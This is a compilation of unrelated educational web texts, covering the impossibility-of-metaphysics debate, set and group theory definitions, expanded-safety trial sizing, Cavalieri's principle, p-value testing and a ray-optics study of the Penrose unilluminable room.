Let us suppose that we are confident that we are able to identify every statement as either “a metaphysical statement” or “not a metaphysical statement”. (We need not suppose that this ability is grounded in some non-trivial definition or account of metaphysics.) Let us call the thesis that all metaphysical statements are meaningless “the strong form” of the thesis that metaphysics is impossible. (At one time, an enemy of metaphysics might have been content to say that all metaphysical statements were false. But this is obviously not a possible thesis if the denial of a metaphysical statement must itself be a metaphysical statement.) And let us call the following statement the “weak form” of the thesis that metaphysics is impossible: metaphysical statements are meaningful, but human beings can never discover whether any metaphysical statement is true or false (or probable or improbable or warranted or unwarranted).
Let us briefly examine an example of the strong form of the thesis that metaphysics is impossible. The logical positivists maintained that the meaning of a (non-analytic) statement consisted entirely in the predictions it made about possible experience. They maintained, further, that metaphysical statements (which were obviously not put forward as analytic truths) made no predictions about experience. Therefore, they concluded, metaphysical statements are meaningless—or, better, the “statements” we classify as metaphysical are not really statements at all: they are things that look like statements but aren't, rather as mannequins are things that look like human beings but aren't.
But (many philosophers asked) how does the logical positivist's central thesis
The meaning of a statement consists entirely in the predictions it makes about possible experience
fare by its own standards? Does this thesis make any predictions about possible experiences? Could some observation show that it was true? Could some experiment show that it was false? It would seem not. It would seem that everything in the world would look the same—like this—whether this thesis was true or false. (Will the positivist reply that the offset sentence is analytic? This reply is problematic in that it implies that the multitude of native speakers of English who reject the logical positivists' account of meaning somehow cannot see that that sentence is true in virtue of the meaning of the word “meaning”—which is no technical term but a word of ordinary English.) And, therefore, if the statement is true it is meaningless; or, what is the same thing, if it is meaningful, it is false. Logical positivism would therefore seem to say of itself that it is false or meaningless; it would seem to be, to use a currently fashionable phrase, “self-referentially incoherent”.
Current advocates of ‘metaphysical anti-realism’ also advocate a strong form of the thesis that metaphysics is impossible. Insofar as it is possible to find a coherent line of argument in the writings of any anti-realist, it is hard to see why they, like the logical positivists, are not open to a charge of self-referential incoherency. Indeed, there is much to be said for the conclusion that all forms of the strong thesis fall prey to self-referential incoherency. Put very abstractly, the case against proponents of the strong thesis may be put like this. Dr. McZed, a “strong anti-metaphysician”, contends that any piece of text that does not pass some test she specifies is meaningless (if she is typical of strong anti-metaphysicians, she will say that any text that fails the test represents an attempt to use language in a way in which language cannot be used). And she contends further that any piece of text that can plausibly be identified as “metaphysical” must fail this test. But it invariably turns out that various sentences that are essential components of McZed's case against metaphysics themselves fail to pass her test. A test-case for this very schematic and abstract refutation of all refutations of metaphysics is the very sophisticated and subtle critique of metaphysics (it purports to apply only to the kind of metaphysics exemplified by the seventeenth-century rationalists and current analytical metaphysics) presented in van Fraassen 2002. It is a defensible position that van Fraassen's case against metaphysics depends essentially on certain theses that, although they are not themselves metaphysical theses, are nevertheless open to many of the criticisms he brings against metaphysical theses.
The weak form of the thesis that metaphysics is impossible is this: there is something about the human mind (perhaps even the minds of all rational agents or all finite rational agents) that unfits it for reaching metaphysical conclusions in any reliable way. This idea is at least as old as Kant, but a version of it that is much more modest than Kant's (and much easier to understand) has been carefully presented in McGinn 1993. McGinn's argument for the conclusion that the human mind is (as a matter of evolutionary contingency, and not simply because it is “a mind”) incapable of a satisfactory treatment of a large range of philosophical questions (a range that includes all metaphysical questions), however, depends on speculative factual theses about human cognitive capacities that are in principle subject to empirical refutation and which are at present without significant empirical support. For a different defense of the weak thesis, see Thomasson 2009.
- Armstrong, David, 1989, Universals: An Opinionated Introduction, Boulder, CO: Westview.
- –––, 1997, A World of States of Affairs, Cambridge: Cambridge University Press.
- Baker, Lynne Rudder, 2000, Persons and Bodies: A Constitution View, Cambridge: Cambridge University Press.
- Barcan [Barcan Marcus], Ruth, 1946, “A Functional Calculus of First Order Based on Strict Implication”, Journal of Symbolic Logic, 11: 1–16.
- Broad, C. D., 1925, The Mind and its Place in Nature, London: Lund Humphries.
- Davidson, Donald, 1967, “Causal Relations”, Journal of Philosophy, 64: 691–703.
- Fine, Kit, 2001, “The Question of Realism”, Philosopher's Imprint, 1: 1–30.
- Ginet, Carl, 1990, On Action, Cambridge: Cambridge University Press.
- Kripke, Saul, 1972, Naming and Necessity, Cambridge, MA: Harvard University Press.
- Laurence, Stephen and Cynthia Macdonald (eds.), 1998, Contemporary Readings in the Foundations of Metaphysics, Oxford: Blackwell.
- Lewis, David, 1973, “Causation”, Journal of Philosophy, 70: 556–67.
- –––, 1986, On the Plurality of Worlds, Oxford: Blackwell.
- Lowe, E. J., 2006, The Four-Category Ontology: A Metaphysical Foundation for Natural Science, Oxford: The Clarendon Press.
- McGinn, Colin, 1993, Problems in Philosophy: The Limits of Inquiry, Oxford: Blackwell.
- McTaggart, J. M. E., 1908, “The Unreality of Time”, Mind, 17: 457–474.
- Paul, L.A. and Ned Hall, 2013, Causation: A User's Guide, Oxford: Oxford University Press.
- Plantinga, Alvin, 1974, The Nature of Necessity, Oxford: The Clarendon Press.
- Politis, Vasilis, 2004, Aristotle and the Metaphysics, London and New York: Routledge.
- Prior, A.N., 1998, “The Notion of the Present”, in Metaphysics: The Big Questions, Peter van Inwagen and Dean Zimmerman (eds.), Oxford: Blackwell Press.
- Quine, W. V. O., 1948, “On What There Is”, in Quine 1961: 1–19.
- –––, 1953, “Reference and Modality”, in Quine 1961: 139–159.
- –––, 1960, Word and Object, Cambridge, MA: MIT Press.
- –––, 1961, From a Logical Point of View, Cambridge, MA: MIT Press.
- Rea, Michael (ed.), 1997, Material Constitution: A Reader, Lanham, MD: Rowman & Littlefield.
- Sartre, Jean-Paul, 1949, Situations III, Paris: Gallimard.
- Schaffer, Jonathan, 2010, “Monism: The Priority of the Whole”, Philosophical Review, 119: 31–76.
- Sider, Theodore, 2012, Writing the Book of the World, Oxford: Oxford University Press.
- Stalnaker, Robert, 1968, “A Theory of Conditionals”, in Studies in Logical Theory, Nicholas Rescher (ed.), Oxford: Blackwell.
- Sullivan, Meghan, 2012, “The Minimal A-Theory”, Philosophical Studies, 158: 149–174.
- Thomasson, Amie, 2009, “Answerable and Unanswerable Questions”, in Metametaphysics: New Essays on the Foundations of Ontology, David J. Chalmers, David Manley, and Ryan Wasserman (eds.), Oxford: Oxford University Press.
- Thomson, Judith Jarvis, 1998, “The Statue and Clay”, Noûs, 32: 149–173.
- Van Fraassen, Bas C., 2002, The Empirical Stance, New Haven, CT: Yale University Press.
- Van Inwagen, Peter, 1998, “The Mystery of Metaphysical Freedom”, in Peter van Inwagen and Dean W. Zimmerman (eds.), Metaphysics: The Big Questions, Malden, MA: Blackwell: 365–374.
- Williamson, Timothy, 2013, Modal Logic as Metaphysics, Oxford: Oxford University Press.
- Zimmerman, Dean W. (ed.), 2006, Oxford Studies in Metaphysics (Volume 2), Oxford: The Clarendon Press.
Other Internet Resources
- The Determinism and Freedom Philosophy Website, edited by Ted Honderich.
- $\mathbb U$
Sets are considered to be subsets of some large universal set, also called the universe.
Exactly what this universe is will vary depending on the subject and context.
When discussing particular sets, it should be made clear just what that universe is.
However, note that from There Exists No Universal Set, this universe cannot be everything that there is.
The traditional symbol used to signify the universe is $\mathfrak A$.
However, this is old-fashioned and inconvenient, so some newer texts have taken to using $\mathbb U$ or just $U$ instead.
With this notation, this definition can be put into symbols as:
- $\forall S: S \subseteq \mathbb U$
The use of $\mathbb U$ or a variant is not universal: some sources use $X$.
The $\LaTeX$ code for \(\mathbb U\) is "\mathbb U".
The symbol \(U\) is frequently used, and conventionally in many texts, to denote an open set in the context of topology.
The $\LaTeX$ code for \(U\) is "U".
Expanded Safety (ES) trials are phase IV trials designed to estimate the frequency of uncommon adverse events that may have been undetected in earlier studies. These studies may be nonrandomized.
Typically, we assume that the study population is large, the probability of an adverse event is small (because it did not crop up in prior trials), and all participants in the cohort of size m are followed for approximately the same length of time. Under these assumptions, we can model the probability of exactly d events occurring based on a Poisson probability function, i.e.,
\( \Pr \left[ D = d \right] = (\xi m)^d \exp(-\xi m)/d! \)
where \( \xi \) is the adverse event rate.
The cohort should be large enough to have a high probability of observing at least one event when the event rate is \( \xi \). Thus, we want
\( \beta = \Pr \left[ D \ge 1 \right] = 1 - \Pr \left[ D = 0 \right] = 1 - \exp(-\xi m) \)
to be relatively large. With respect to the cohort size, this means that m should be selected such that
\( m = -\log_e(1 - \beta)/\xi \)
Suppose a pharmaceutical company is planning an ES trial for a new anti-arrhythmia drug. The company wants to determine the cohort size for following patients on the drug for a period of two years in terms of myocardial infarction. They want to have a 0.99 probability \(\left(\beta = 0.99 \right)\) for detecting a myocardial infarction rate of one per thousand (\( \xi \) = 0.001).
This yields a cohort size of m = 4,605.17, which is rounded up to m = 4,606.
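The cohort-size formula is easy to check numerically. The sketch below (plain Python, standard library only) reproduces the worked example; the values of \(\beta\) and \(\xi\) are those given in the text.

```python
import math

def es_cohort_size(beta, xi):
    """Smallest cohort size m with P(at least one event) >= beta,
    under the Poisson model Pr[D = d] = (xi*m)^d exp(-xi*m) / d!."""
    return math.ceil(-math.log(1 - beta) / xi)

# Worked example from the text: beta = 0.99, xi = 0.001 over two years.
m = es_cohort_size(beta=0.99, xi=0.001)
print(m)  # 4606

# Sanity check: with m = 4606, the detection probability exceeds 0.99.
prob_at_least_one = 1 - math.exp(-0.001 * m)
```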
(Note that the \(\beta\) value in this problem is a probability of detecting at least one event, which is not quite the same as the \(\beta\) we use in calculating power.)
Terrace and gradient

Posted by Yuling Yao on Oct 05, 2021.
I came across a paper, “The Adaptive Biasing Force Method: Everything You Always Wanted To Know but Were Afraid To Ask” by Jeffrey Comer et al. When comparing the adaptive biasing force method (a gradient-based method) and importance sampling based methods (zero-order methods), the authors concluded that
From a mathematical viewpoint, the adaptive biasing force method, just like adaptive biasing potential methods, is an adaptive importance-sampling procedure. There is, however, a salient difference between these two techniques. In the latter, the potential of mean force or, equivalently, the corresponding probability distribution along the transition coordinate is being adapted. In contrast, the former relies on biasing the force, i.e., the gradient of the potential. This difference is more important than it might appear at first sight, as potentials and probability distributions are global properties whereas gradients are defined locally. In terms of probability distributions, it means that the count of samples in the neighborhood of a given value of the transition coordinate is insufficient to estimate probability. Knowledge of the underlying probability distribution over a much broader range of $\xi$ is required. This may considerably impede efficient adaptation. In contrast, all that is needed to estimate the gradient is the knowledge of local behavior of the potential of mean force. Other regions along the transition coordinate do not have to be visited. Thus, in many instances, adaptation proceeds markedly faster. Using a common metaphor, the difference between the adaptive biasing potential and adaptive biasing force methods can be compared to inundating the valleys of the free-energy landscape as opposed to plowing over its barriers to yield an approximately flat terrain, conducive to unhampered diffusion.
I like the plowing metaphor. I found a photo of Rice Terraces in Yunnan:
which is in contrast to:
Aside from the context of free energy computation, the same reasoning behind the metaphor suggests that the gradient-based method is often a dual alternative to the zero-order method:
- In survival analysis, the Nelson–Aalen estimator is sort of the gradient version of the Kaplan–Meier (product-limit) estimator.
- In optimization, finding the mode of a convex function is equivalent to finding the minimum of the absolute value of its gradient.
- In cross-validation, the jackknife is the gradient-alternative to importance sampling.
- In optimization convergence test, we can either monitor if the objective is stable, or if the gradient becomes zero.
- In MCMC convergence test, we can either monitor if the sample draws have mixed, or if the gradient of the log density has mean zero.
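As a toy illustration of the optimization bullet (a sketch with an assumed objective \(f(x) = (x-2)^2\), not taken from the post): the minimizer can be found either by a zero-order search on \(f\) itself, or by locating the zero of its gradient.

```python
def ternary_search_min(f, lo, hi, iters=100):
    # Zero-order view: shrink the bracket using only function values.
    for _ in range(iters):
        m1 = lo + (hi - lo) / 3
        m2 = hi - (hi - lo) / 3
        if f(m1) < f(m2):
            hi = m2
        else:
            lo = m1
    return (lo + hi) / 2

def bisect_root(g, lo, hi, iters=100):
    # Gradient view: bisection on the sign change of the derivative.
    for _ in range(iters):
        mid = (lo + hi) / 2
        if g(lo) * g(mid) <= 0:
            hi = mid
        else:
            lo = mid
    return (lo + hi) / 2

f = lambda x: (x - 2) ** 2   # toy convex objective (assumed)
grad = lambda x: 2 * (x - 2)  # its gradient

x_zero_order = ternary_search_min(f, -10, 10)
x_gradient = bisect_root(grad, -10, 10)
# Both recover the minimizer x = 2.
```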
Should we compute more gradients?
Definition:Transversal (Group Theory)/Right Transversal
Let $G$ be a group.
Let $H$ be a subgroup of $G$.
Let $S \subseteq G$ be a subset of $G$.
$S$ is a right transversal for $H$ in $G$ if and only if every right coset of $H$ contains exactly one element of $S$.
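As a concrete sketch (an illustrative toy example, not from the source): in the additive group \(\Z_6\) with subgroup \(H = \{0, 3\}\), the right cosets are \(\{0,3\}, \{1,4\}, \{2,5\}\), and \(S = \{0, 1, 2\}\) meets each coset exactly once.

```python
# Toy check of the definition in the cyclic group Z_6 (written additively),
# with subgroup H = {0, 3}.  The right cosets H + g partition Z_6.
n = 6
G = set(range(n))
H = {0, 3}

def right_coset(H, g):
    # In additive notation, the right coset Hg is {h + g : h in H}.
    return frozenset((h + g) % n for h in H)

cosets = {right_coset(H, g) for g in G}

def is_right_transversal(S):
    # S is a right transversal iff every right coset contains
    # exactly one element of S.
    return all(len(coset & S) == 1 for coset in cosets)

print(is_right_transversal({0, 1, 2}))  # True: one representative per coset
print(is_right_transversal({0, 3}))     # False: both lie in the same coset
```

(Since \(\Z_6\) is abelian, left and right cosets coincide here; the check illustrates the definition all the same.)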
Also known as
A right transversal is also known as a set of right coset representatives.
Cavalieri's principle should not be confused with Cavalieri's quadrature formula.
In geometry, Cavalieri's principle, a modern implementation of the method of indivisibles, named after Bonaventura Cavalieri, is as follows:
- 2-dimensional case: Suppose two regions in a plane are included between two parallel lines in that plane. If every line parallel to these two lines intersects both regions in line segments of equal length, then the two regions have equal areas.
- 3-dimensional case: Suppose two regions in three-space (solids) are included between two parallel planes. If every plane parallel to these two planes intersects both regions in cross-sections of equal area, then the two regions have equal volumes.
Today Cavalieri's principle is seen as an early step towards integral calculus, and while it is used in some forms, such as its generalization in Fubini's theorem, results using Cavalieri's principle can often be shown more directly via integration. In the other direction, Cavalieri's principle grew out of the ancient Greek method of exhaustion, which used limits but did not use infinitesimals.
Cavalieri's principle was originally called the method of indivisibles, the name it was known by in Renaissance Europe. Cavalieri developed a complete theory of indivisibles, elaborated in his Geometria indivisibilibus continuorum nova quadam ratione promota (Geometry, advanced in a new way by the indivisibles of the continua, 1635) and his Exercitationes geometricae sex (Six geometrical exercises, 1647). While Cavalieri's work established the principle, in his publications he denied that the continuum was composed of indivisibles in an effort to avoid the associated paradoxes and religious controversies, and he did not use it to find previously unknown results.
In the 3rd century BC, Archimedes, using a method resembling Cavalieri's principle, was able to find the volume of a sphere given the volumes of a cone and cylinder in his work The Method of Mechanical Theorems. In the 5th century AD, Zu Chongzhi and his son Zu Gengzhi established a similar method to find a sphere's volume. The transition from Cavalieri's indivisibles to Evangelista Torricelli's and John Wallis's infinitesimals was a major advance in the history of calculus. The indivisibles were entities of codimension 1, so that a plane figure was thought as made out of an infinite number of 1-dimensional lines. Meanwhile, infinitesimals were entities of the same dimension as the figure they make up; thus, a plane figure would be made out of "parallelograms" of infinitesimal width. Applying the formula for the sum of an arithmetic progression, Wallis computed the area of a triangle by partitioning it into infinitesimal parallelograms of width 1/∞.
N. Reed has shown how to find the area bounded by a cycloid by using Cavalieri's principle. A circle of radius r can roll in a clockwise direction upon a line below it, or in a counterclockwise direction upon a line above it. A point on the circle thereby traces out two cycloids. When the circle has rolled any particular distance, the angle through which it would have turned clockwise and that through which it would have turned counterclockwise are the same. The two points tracing the cycloids are therefore at equal heights. The line through them is therefore horizontal (i.e. parallel to the two lines on which the circle rolls). Consequently each horizontal cross-section of the circle has the same length as the corresponding horizontal cross-section of the region bounded by the two arcs of cycloids. By Cavalieri's principle, the circle therefore has the same area as that region.
Consider the rectangle bounding a single cycloid arch. From the definition of a cycloid, it has width \(2\pi r\) and height \(2r\), so its area is four times the area of the circle. Calculate the area within this rectangle that lies above the cycloid arch by bisecting the rectangle at the midpoint where the arch meets the rectangle, rotate one piece by 180° and overlay the other half of the rectangle with it. The new rectangle, of area twice that of the circle, consists of the "lens" region between two cycloids, whose area was calculated above to be the same as that of the circle, and the two regions that formed the region above the cycloid arch in the original rectangle. Thus, the area bounded by a rectangle above a single complete arch of the cycloid has area equal to the area of the circle, and so, the area bounded by the arch is three times the area of the circle.
The fact that the volume of any pyramid, regardless of the shape of the base, whether circular as in the case of a cone, or square as in the case of the Egyptian pyramids, or any other shape, is (1/3) × base × height, can be established by Cavalieri's principle if one knows only that it is true in one case. One may initially establish it in a single case by partitioning the interior of a triangular prism into three pyramidal components of equal volumes. One may show the equality of those three volumes by means of Cavalieri's principle.
In fact, Cavalieri's principle or similar infinitesimal argument is necessary to compute the volume of cones and even pyramids, which is essentially the content of Hilbert's third problem – polyhedral pyramids and cones cannot be cut and rearranged into a standard shape, and instead must be compared by infinite (infinitesimal) means. The ancient Greeks used various precursor techniques such as Archimedes's mechanical arguments or method of exhaustion to compute these volumes.
Consider a cylinder of radius \(r\) and height \(h\), circumscribing a paraboloid whose apex is at the centre of the bottom base of the cylinder and whose base is the top base of the cylinder. Consider also the congruent paraboloid with its apex and base flipped.

For every height \(0 \le y \le h\), the disk-shaped cross-section of the flipped paraboloid has area \(\pi r^2 \left(1 - \frac{y}{h}\right)\), which equals the area of the ring-shaped cross-section of the part of the cylinder lying outside the inscribed paraboloid at the same height.

Therefore, the volume of the flipped paraboloid is equal to the volume of the cylinder part outside the inscribed paraboloid. In other words, the volume of the paraboloid is \(\tfrac{1}{2}\pi r^2 h\), half the volume of its circumscribing cylinder.
If one knows that the volume of a cone is \(\tfrac{1}{3}\,(\text{base} \times \text{height})\), then one can use Cavalieri's principle to derive the fact that the volume of a sphere is \(\tfrac{4}{3}\pi r^3\), where \(r\) is the radius of the sphere.
That is done as follows: Consider a sphere of radius \(r\), and a cylinder of radius \(r\) and height \(r\) whose bottom base lies in the plane of the sphere's equator. Within the cylinder is the cone whose apex is at the centre of the bottom base of the cylinder and whose base is the top base of the cylinder. By the Pythagorean theorem, the plane located \(y\) units above the equator intersects the sphere in a circle of radius \(\sqrt{r^2 - y^2}\) and area \(\pi(r^2 - y^2)\). The intersection of that plane with the part of the cylinder outside the cone is an annulus of outer radius \(r\) and inner radius \(y\) (the cone's cross-section \(y\) units above its apex is a circle of radius \(y\)), so its area is also \(\pi(r^2 - y^2)\). By Cavalieri's principle, the volume of the upper half-sphere therefore equals the volume of the part of the cylinder outside the cone. The volume of the cone is \(\tfrac{1}{3}\) of the volume of the cylinder, so the volume outside the cone is \(\tfrac{2}{3}\) of the volume of the cylinder, where the volume of the cylinder is

\(\text{base} \times \text{height} = \pi r^2 \cdot r = \pi r^3\)

("Base" is in units of area; "height" is in units of distance. Area \(\times\) distance = volume.)

Therefore the volume of the upper half-sphere is \(\tfrac{2}{3}\pi r^3\) and that of the whole sphere is \(\tfrac{4}{3}\pi r^3\).
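The slice-by-slice equality underlying this argument can be checked numerically. The sketch below (with \(r = 1\) assumed) verifies that every sphere slice matches the corresponding cylinder-minus-cone slice, and that the resulting Riemann sum approaches \(\tfrac{2}{3}\pi r^3\).

```python
import math

r = 1.0
n = 100_000
dy = r / n
half_sphere = 0.0
for i in range(n):
    y = (i + 0.5) * dy                         # midpoint of the i-th slice
    disk = math.pi * (r**2 - y**2)             # sphere cross-section at height y
    annulus = math.pi * r**2 - math.pi * y**2  # cylinder minus cone cross-section
    assert abs(disk - annulus) < 1e-12         # Cavalieri: equal slice areas
    half_sphere += disk * dy

# The Riemann sum approaches (2/3) * pi * r^3, as derived above.
print(abs(half_sphere - (2 / 3) * math.pi * r**3) < 1e-6)  # True
```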
See main article: Napkin ring problem.
In what is called the napkin ring problem, one shows by Cavalieri's principle that when a hole is drilled straight through the centre of a sphere where the remaining band has height h, the volume of the remaining material surprisingly does not depend on the size of the sphere. The cross-section of the remaining ring is a plane annulus, whose area is the difference between the areas of two circles. By the Pythagorean theorem, the area of one of the two circles is \(\pi(r^2 - y^2)\), where r is the sphere's radius and y is the distance from the plane of the equator to the cutting plane, and that of the other is \(\pi\left(r^2 - (h/2)^2\right)\). When these are subtracted, the \(r^2\) cancels; hence the lack of dependence of the bottom-line answer upon r.
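A quick numerical check of the claim (a sketch; the radii 1 and 100 are arbitrary illustrative choices): integrating the annular cross-sections shows that the volume depends only on the band height h.

```python
import math

def napkin_ring_volume(r, h, n=200_000):
    """Integrate the annulus areas pi*((r^2 - y^2) - (r^2 - (h/2)^2))
    over -h/2 <= y <= h/2 by the midpoint rule.  Requires h <= 2*r."""
    inner_sq = r**2 - (h / 2) ** 2   # squared radius of the drilled hole
    dy = h / n
    total = 0.0
    for i in range(n):
        y = -h / 2 + (i + 0.5) * dy
        total += math.pi * ((r**2 - y**2) - inner_sq) * dy
    return total

v_small = napkin_ring_volume(r=1.0, h=1.0)
v_big = napkin_ring_volume(r=100.0, h=1.0)
# Both agree with pi * h^3 / 6, independent of the sphere's radius.
print(abs(v_small - v_big) < 1e-6)  # True
```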
Two Methods for Making a Statistical Decision
Of the two methods for making a statistical decision, the p-value approach is more commonly used and provided in published literature. However, understanding the rejection region approach can go a long way in one's understanding of the p-value method. In the video, we show how the two methods are related. Regardless of the method applied, the conclusions from the two approaches are exactly the same.
Video: The Rejection Region vs the P-Value Approach
Comparing the Two Approaches
Both approaches will ensure the same conclusion and either one will work. However, using the p-value approach has the following advantages:
- Using the rejection region approach, you need to check the table or software for the critical value every time you use a different \(\alpha \) value.
- In addition to just using it to reject or not reject \(H_0 \) by comparing p-value to \(\alpha \) value, the p-value also gives us some idea of the strength of the evidence against \(H_0 \). | <urn:uuid:9816c101-24c0-4c24-80bd-603b4f820625> | CC-MAIN-2023-14 | https://online.stat.psu.edu/stat500/lesson/6a/6a.4/6a.4.2 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948684.19/warc/CC-MAIN-20230327185741-20230327215741-00212.warc.gz | en | 0.890488 | 220 | 2.84375 | 3 |
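The equivalence of the two approaches can also be checked numerically. The sketch below (not part of the lesson) runs a right-tailed z-test and makes the decision both ways using only the Python standard library:

```python
from statistics import NormalDist

def decisions(z, alpha=0.05):
    """Right-tailed z-test: make the reject/fail-to-reject decision two ways."""
    p_value = 1 - NormalDist().cdf(z)           # p-value approach: P(Z >= z) under H0
    critical = NormalDist().inv_cdf(1 - alpha)  # rejection region approach: z > critical value
    return p_value < alpha, z > critical

# For any value of the test statistic, the two approaches agree:
for z in (-1.0, 0.5, 1.5, 1.7, 2.5):
    reject_by_p, reject_by_region = decisions(z)
    assert reject_by_p == reject_by_region
```

The agreement is no accident: since the normal CDF is strictly increasing, p < \(\alpha\) holds exactly when the test statistic exceeds the critical value.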
Investigating the Penrose Unilluminable Room with Ray Optics
An interesting question was raised in the 1950s by the mathematician Ernst Straus: In an arbitrarily shaped empty room with side walls made of perfect mirrors, will a point light source always illuminate the whole room? This question was answered elegantly by the Nobel laureate Sir Roger Penrose, who designed a room with unilluminable areas that is thus termed “the Penrose unilluminable room”. However, is the Penrose unilluminable room really unilluminable? Using the COMSOL Multiphysics® software to generate simulations, we will see if this is the case and discuss the fundamental assumption of ray optics.
The Illumination Problem
When you hear the question for the first time, it might not be immediately clear what exactly it is asking. Let’s consider the example shown in the figure below. As shown on the left, the mirrored side wall of a 2D room can take an arbitrary shape, and the light source can be placed in any location within the room. In this particular case, it’s easy to imagine that the whole room will be illuminated by the light source, which is unsurprisingly confirmed by the ray tracing simulation on the right. Essentially, Straus’ question is whether there exists a design of the shape of the room such that, when a point light source is placed inside, certain areas are not illuminated.
An empty room with arbitrarily shaped side walls made of perfect mirrors and a point light source inside the room (left). A ray tracing simulation showing that the entire room is illuminated by the point light source (right).
Upon seeing the problem, I immediately thought that perhaps a room with very sharp corners could prevent certain areas from being illuminated. You have probably already guessed it, however: If it were this easy to figure out the shape of an unilluminable room, it wouldn’t have been an interesting question for the science community. We can see that, given sufficient time, the light will always illuminate the whole room. At this point, you might not be convinced and think you can design an unilluminable room. If you are up to the challenge, please feel free to use the Ray Optics Module to give it a try!
A room with sharp corners fully illuminated by a point light source.
The Penrose Unilluminable Room
This tricky problem was ultimately tackled by the brilliant Roger Penrose, winner of the 2020 Nobel Prize in Physics. His design, shown in the figure below, is not obvious at all at first glance. The room consists of two elliptical walls on the top and bottom and a rectangular area with two “umbrella” cutouts. The only requirements for the design to work are that the top and bottom walls are described as an ellipse x^2/a^2+y^2/b^2=1 and that the focal points of the ellipse coincide with the corner points of the “umbrellas”. Details such as the specific values of a and b, the shape of the umbrella, the width of the umbrella, and so on won’t change the property of the room.
The design of the Penrose unilluminable room.
Let’s use the Ray Optics Module to see if it works! In the animations below, we placed the point light source at some representative points — in the center, in the top half, and to the left of the left-hand umbrella (“underneath” the umbrella, if we imagined it were upright). Light rays are launched from the point isotropically. Clearly, in every case, there are areas not illuminated by the light. When the light source is placed “underneath” the umbrella, the light doesn’t even travel to the lower half of the room. Note that this is not because the time-domain simulation has not been run for long enough. Even when time approaches infinity, these shadow areas remain unilluminated.
Ray tracing simulations with the point light source placed in different locations of the Penrose unilluminable room. In all cases, there always exist areas not illuminated.
The special characteristics of the Penrose unilluminable room come from the special properties of the elliptical mirror. You may recall from your college optics class that light originating from one focal point of an elliptical mirror will be focused on the other focal point. This property is demonstrated by the animation below on the left. The other lesser known property of an elliptical mirror is that when the light originates between a focal point and the closest apex of the ellipse, it will only arrive at a point between the other focal point and the other apex, never intersecting the long axis between the focal points. This property is demonstrated by the animation in the middle below. In addition, light originating between the two focal points will never intersect the long axis between each focal point and its closest apex, as demonstrated by the animation on the right.
Left: Light rays launched at a focal point will only intersect the long axis at the focal points. Middle: Light rays launched between a focal point and the closest apex will not intersect the long axis between the focal points. Right: Light rays launched between two focal points will only intersect the long axis between the focal points.
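The first of these properties is easy to check numerically. The sketch below (plain Python geometry, not a COMSOL model) reflects a single ray inside the ellipse x^2/a^2 + y^2/b^2 = 1 and verifies that a ray fired from one focus passes through the other after one bounce:

```python
import math

def reflect_ray_in_ellipse(a, b, origin, theta):
    """Fire a ray from `origin` inside the ellipse x^2/a^2 + y^2/b^2 = 1;
    return the wall hit point and the specularly reflected direction."""
    dx, dy = math.cos(theta), math.sin(theta)
    ox, oy = origin
    # Substitute (ox + s*dx, oy + s*dy) into the ellipse equation: quadratic in s.
    A = dx**2 / a**2 + dy**2 / b**2
    B = 2 * (ox * dx / a**2 + oy * dy / b**2)
    C = ox**2 / a**2 + oy**2 / b**2 - 1
    s = (-B + math.sqrt(B**2 - 4*A*C)) / (2*A)   # positive root = first wall hit
    qx, qy = ox + s*dx, oy + s*dy
    nx, ny = qx / a**2, qy / b**2                # normal direction from the gradient
    norm = math.hypot(nx, ny)
    nx, ny = nx / norm, ny / norm
    dot = dx*nx + dy*ny
    rx, ry = dx - 2*dot*nx, dy - 2*dot*ny        # specular reflection of the direction
    return (qx, qy), (rx, ry)

a, b = 2.0, 1.0
c = math.sqrt(a*a - b*b)                         # focal points at (+-c, 0)
(qx, qy), (rx, ry) = reflect_ray_in_ellipse(a, b, (c, 0.0), theta=0.7)
# Distance from the other focus (-c, 0) to the reflected ray's line:
vx, vy = -c - qx, -qy
dist = abs(rx*vy - ry*vx) / math.hypot(rx, ry)
assert dist < 1e-9                               # the reflected ray passes through (-c, 0)
```

Repeating the check for many launch angles confirms the focusing property that the Penrose design exploits.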
With these properties in mind, we can divide the Penrose unilluminable room into the regions shown below. It’s important to note again that in Penrose’s design, the focal points of the ellipse coincide with the edges of the umbrellas. As such, we know that:
- A light source placed inside A_1 will only illuminate A_1, B_1, and A_2 because it can never intersect the long axis of the ellipse between the focal points and enter the C_1 area.
- A light source placed in B_1 will leave A_3 and A_4 unilluminated because the light rays can only enter the lower half of the room between the two focal points of the lower ellipse. Thus, they can never intersect the long axis between the focal points and apexes and enter A_3 and A_4.
- A light source placed in C_1 will leave A_1, A_2, A_3, and A_4 unilluminated for the same reason.
Due to the symmetry, the same effects will occur for a light source placed in the corresponding regions of the lower half of the room. Therefore, we can conclude that the Penrose unilluminable room will always have unilluminated areas no matter where the point light source is placed within the room.
Dividing the room into different regions. A light source placed inside A_1 will only illuminate A_1, B_1, and A_2. A light source placed in B_1 will leave A_3 and A_4 unilluminated. A light source placed in C_1 will leave A_1, A_2, A_3, and A_4 unilluminated.
Let There Be Light: Illuminate the Unilluminable Area
The ray tracing simulations above seem to show convincing results that confirm the room being unilluminable, but is it really? We need to remember the fundamental assumption of ray optics: that the wavelength of the light is much smaller than the size of the object that the light interacts with, so that the diffraction effect can be totally ignored. Recall that a is the long axis of the ellipse that describes the top and bottom walls of the room. The ray optics simulation essentially assumes the wavelength λ ≪ a. If we have a real-life room whose dimensions are on the order of meters and a light source in the visible spectral range (~500 nm wavelength), this assumption holds up very well. But what if we shrink the room or increase the wavelength of the light such that λ is comparable to a?
To test this, we switch to the Wave Optics Module to perform full wave simulations. A point Line Current (Out-of-Plane) is placed "underneath" the umbrella in the top left corner (in the A_1 region), similar to the third ray tracing animation of the room shown above. The Line Current functions as a point source that emits a cylindrical wave with the electric field pointing in the out-of-plane direction. The field distributions at increasing wavelengths are simulated in the frequency domain and shown below. At λ = a/40 (top left), the field distribution is similar to the ray tracing simulation, as expected. The field does not seem to penetrate the lower half of the room. However, as the wavelength gets longer, diffraction becomes more prominent, such that the field leaks into the lower half of the room. At λ = a/10 (bottom left) and λ = a/5 (bottom right), it's very clear that the previously unilluminated area is illuminated!
Simulated field distributions in the frequency domain at λ = a/40, λ = a/20, λ = a/10, and λ = a/5. At shorter wavelengths, the field distribution resembles the ray tracing result. However, at longer wavelengths, the field penetrates into the area that was previously not illuminated due to diffraction. The norm of the electric field is plotted in these figures.
In addition to using the Electromagnetic Waves, Frequency Domain interface to visualize the field distribution at equilibrium, running a time-domain simulation using the Electromagnetic Wave, Transient interface can help to visualize the wave propagation and diffraction.
Out-of-plane electric field emitted by a Line Current located in the top half of the room “underneath” (to the left of) the left-hand umbrella and simulated in the time domain. Due to diffraction, the field leaks into the lower half of the room. The wavelength is a/5.
